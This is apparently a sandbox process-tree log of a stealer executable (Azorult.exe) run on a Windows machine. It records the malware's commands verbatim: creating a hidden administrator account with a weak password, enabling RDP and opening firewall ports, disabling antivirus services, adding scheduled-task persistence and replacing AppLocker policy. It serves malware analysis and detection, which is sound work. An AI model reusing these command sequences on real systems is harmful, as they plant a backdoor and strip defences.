C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1288 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:12⤵PID:1192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:12⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:12⤵PID:3140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:12⤵PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:12⤵PID:1996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1148 /prefetch:12⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵PID:2368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2196,8599667343060236282,4524531645877908072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:82⤵PID:1900
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3264
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2776
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2924
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap3377:108:7zEvent214371⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Azorult.exe"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\Stealer\Azorult.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:236 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4012 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Checks computer location settings
PID:3612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵PID:4704
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:4264
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
PID:3664
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4744
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3896
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4408
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3180
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
PID:1592
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:1316
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
- Launches sc.exe
PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
- Launches sc.exe
PID:4688
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵PID:420
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:4288
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4112 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1260 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2896
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1672 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
- Checks computer location settings
PID:1156 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Checks computer location settings
- Modifies registry class
PID:3560 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:3752
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:1900
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
PID:1396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:2964
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵PID:1628
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵PID:3064
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1452
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵PID:564
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
- System Location Discovery: System Language Discovery
PID:2512
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵PID:3604
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
- System Location Discovery: System Language Discovery
PID:4352 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵PID:4048
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵PID:3664
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
- System Location Discovery: System Language Discovery
PID:2544
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵PID:4136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵PID:4440
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵PID:5012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵PID:2576
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵PID:4680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:2488
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵PID:1120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵PID:2844
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1616 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1316
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵PID:1396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵PID:2348
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵PID:3748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:444
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Blocklisted process makes network request
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4876
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
PID:4356
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
- Hide Artifacts: Hidden Users
PID:1592
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵PID:1120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵PID:3684
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:420
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:60
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:444
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:1728
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4112 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3892 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED36.tmp\ED37.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵PID:3212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3892 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵PID:2536
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵PID:1732
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵PID:3060
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵PID:2232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2940
-
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵PID:5104
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Scheduled Task/Job: Scheduled Task
PID:4352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1172
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵PID:740
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3752
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:3368
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:3408
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵PID:3744
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵PID:3872
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵PID:4860
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵PID:2924
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
PID:2352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵PID:2936
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
- Launches sc.exe
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵PID:3664
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵PID:2544
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵PID:2952
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵PID:5112
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
PID:188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
- System Location Discovery: System Language Discovery
PID:4288 -
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
PID:424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵PID:3752
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵PID:348
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
- Launches sc.exe
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
- System Location Discovery: System Language Discovery
PID:4080 -
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
- Launches sc.exe
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵PID:4388
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵PID:2884
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
- Launches sc.exe
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵PID:4012
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
- Launches sc.exe
PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵PID:2108
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
- Launches sc.exe
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵PID:2664
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵PID:5056
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
- Launches sc.exe
PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
- System Location Discovery: System Language Discovery
PID:1288 -
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
PID:3112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵PID:412
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2956
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵PID:2208
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵PID:3808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1372
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
PID:1172 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵PID:2572
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵PID:2488
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵PID:1976
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵PID:3364
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵PID:2684
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
